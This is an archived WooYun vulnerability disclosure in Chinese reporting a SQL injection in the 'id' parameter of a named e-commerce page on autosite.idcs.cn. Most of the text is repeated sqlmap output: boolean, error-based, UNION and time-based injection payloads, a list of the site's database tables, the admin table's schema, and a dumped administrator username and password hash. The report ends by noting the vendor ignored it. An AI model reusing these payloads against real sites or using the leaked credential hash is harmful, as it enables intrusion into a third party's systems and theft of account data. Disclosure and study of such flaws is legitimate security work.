乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2014-09-22: 细节已通知厂商并且等待厂商处理中 2014-09-27: 厂商已经主动忽略漏洞,细节向公众公开
天互数据显错数据
http://autosite.idcs.cn/webmall/detail.php?id=683 (GET)
sqlmap identified the following injection points with a total of 70 HTTP(s) requests:---Place: GETParameter: id Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=683' AND 5885=5885 AND 'DAcE'='DAcE Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause Payload: id=683' AND (SELECT 3053 FROM(SELECT COUNT(*),CONCAT(0x7167776c71,(SELECT (CASE WHEN (3053=3053) THEN 1 ELSE 0 END)),0x7173776271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'hHmp'='hHmp Type: UNION query Title: MySQL UNION query (NULL) - 25 columns Payload: id=-5933' UNION ALL SELECT NULL,NULL,CONCAT(0x7167776c71,0x524d494f45564f507163,0x7173776271),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL# Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: id=683' AND SLEEP(5) AND 'nHhU'='nHhU---web server operating system: Windows 2003 or XPweb application technology: ASP.NET, Microsoft IIS 6.0, PHP 5.2.17back-end DBMS: MySQL 5.0sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Place: GETParameter: id Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=683' AND 5885=5885 AND 'DAcE'='DAcE Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause Payload: id=683' AND (SELECT 3053 FROM(SELECT COUNT(*),CONCAT(0x7167776c71,(SELECT (CASE WHEN (3053=3053) THEN 1 ELSE 0 END)),0x7173776271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'hHmp'='hHmp Type: UNION query Title: MySQL UNION query (NULL) - 25 columns Payload: id=-5933' UNION ALL SELECT NULL,NULL,CONCAT(0x7167776c71,0x524d494f45564f507163,0x7173776271),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL# Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: id=683' AND SLEEP(5) AND 'nHhU'='nHhU---web server operating system: Windows 2003 or XPweb application technology: ASP.NET, Microsoft IIS 6.0, PHP 5.2.17back-end DBMS: MySQL >= 5.0.0available databases [2]:[*] a0825103032[*] information_schemasqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Place: GETParameter: id Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=683' AND 5885=5885 AND 'DAcE'='DAcE Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause Payload: id=683' AND (SELECT 3053 FROM(SELECT COUNT(*),CONCAT(0x7167776c71,(SELECT (CASE WHEN (3053=3053) THEN 1 ELSE 0 END)),0x7173776271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'hHmp'='hHmp Type: UNION query Title: MySQL UNION query (NULL) - 25 columns Payload: id=-5933' UNION ALL SELECT NULL,NULL,CONCAT(0x7167776c71,0x524d494f45564f507163,0x7173776271),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL# Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: id=683' AND SLEEP(5) AND 'nHhU'='nHhU---web server operating system: Windows 2003 or XPweb application technology: ASP.NET, Microsoft IIS 6.0, PHP 5.2.17back-end DBMS: MySQL >= 5.0.0Database: a0825103032[93 tables]+--------------------------+| dev_advs_duilian || dev_advs_lb || dev_advs_lbgroup || dev_advs_link || dev_advs_linkgroup || dev_advs_logo || dev_advs_movi || dev_advs_pic || dev_advs_pop || dev_advs_text || dev_base_admin || dev_base_adminauth || dev_base_adminmenu || dev_base_adminrights || dev_base_border || dev_base_coltype || dev_base_config || dev_base_pageset || dev_base_pagetemp || dev_base_plus || dev_base_plusdefault || dev_base_plusplan || dev_base_plusplanid || dev_base_plustemp || dev_base_version || dev_comment || dev_comment_cat || dev_comment_config || dev_down_cat || dev_down_con || dev_down_config || dev_down_downlog || dev_down_pages || dev_down_pcat || dev_down_proj || dev_down_prop || dev_maq || dev_maq_cat || dev_maq_config || dev_member || dev_member_buylist || dev_member_cat || dev_member_centlog || dev_member_centrule || dev_member_centset || dev_member_config || dev_member_defaultrights || dev_member_fav || dev_member_friends || dev_member_group || dev_member_msn || dev_member_notice || dev_member_nums || dev_member_onlinepay || dev_member_pay || dev_member_paycenter || dev_member_regstep || dev_member_rights || dev_member_secure || dev_member_type || dev_member_zone || dev_menu || dev_menu_group || dev_news_cat || dev_news_con || dev_news_config || dev_news_downlog || dev_news_pages || dev_news_pcat || dev_news_proj || dev_news_prop || dev_page || dev_page_group || dev_tools_code || dev_tools_photopolldata || dev_tools_photopollindex || dev_tools_pollconfig || dev_tools_polldata || dev_tools_pollindex || dev_tools_statbase || dev_tools_statcome || dev_tools_statcount || dev_tools_statdate || dev_webmall_config || dev_webmall_goods || dev_webmall_iorder || dev_webmall_modules || dev_webmall_spool || dev_webmall_spoolmod || dev_webmall_tempcat || dev_webmall_temptype || dev_webmall_tmod || dev_webmall_torder |+--------------------------+sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Place: GETParameter: id Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=683' AND 5885=5885 AND 'DAcE'='DAcE Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause Payload: id=683' AND (SELECT 3053 FROM(SELECT COUNT(*),CONCAT(0x7167776c71,(SELECT (CASE WHEN (3053=3053) THEN 1 ELSE 0 END)),0x7173776271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'hHmp'='hHmp Type: UNION query Title: MySQL UNION query (NULL) - 25 columns Payload: id=-5933' UNION ALL SELECT NULL,NULL,CONCAT(0x7167776c71,0x524d494f45564f507163,0x7173776271),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL# Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: id=683' AND SLEEP(5) AND 'nHhU'='nHhU---web server operating system: Windows 2003 or XPweb application technology: ASP.NET, Microsoft IIS 6.0, PHP 5.2.17back-end DBMS: MySQL >= 5.0.0Database: a0825103032Table: dev_base_admin[7 columns]+----------+-------------+| Column | Type |+----------+-------------+| user | varchar(30) || id | int(6) || job | varchar(50) || jobid | varchar(20) || moveable | int(1) || name | varchar(50) || password | varchar(50) |+----------+-------------+sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Place: GETParameter: id Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=683' AND 5885=5885 AND 'DAcE'='DAcE Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause Payload: id=683' AND (SELECT 3053 FROM(SELECT COUNT(*),CONCAT(0x7167776c71,(SELECT (CASE WHEN (3053=3053) THEN 1 ELSE 0 END)),0x7173776271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'hHmp'='hHmp Type: UNION query Title: MySQL UNION query (NULL) - 25 columns Payload: id=-5933' UNION ALL SELECT NULL,NULL,CONCAT(0x7167776c71,0x524d494f45564f507163,0x7173776271),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL# Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: id=683' AND SLEEP(5) AND 'nHhU'='nHhU---web server operating system: Windows 2003 or XPweb application technology: ASP.NET, Microsoft IIS 6.0, PHP 5.2.17back-end DBMS: MySQL >= 5.0.0Database: a0825103032Table: dev_base_admin[1 entry]+--------+----------------------------------+| user | password |+--------+----------------------------------+| admin | 0087d67286b3e04815885860efefcdc4 |+--------+----------------------------------+
查询语句,绝对路径泄漏,水平有限,没能getshell。
过滤
危害等级:无影响厂商忽略
忽略时间:2014-09-27 18:54
暂无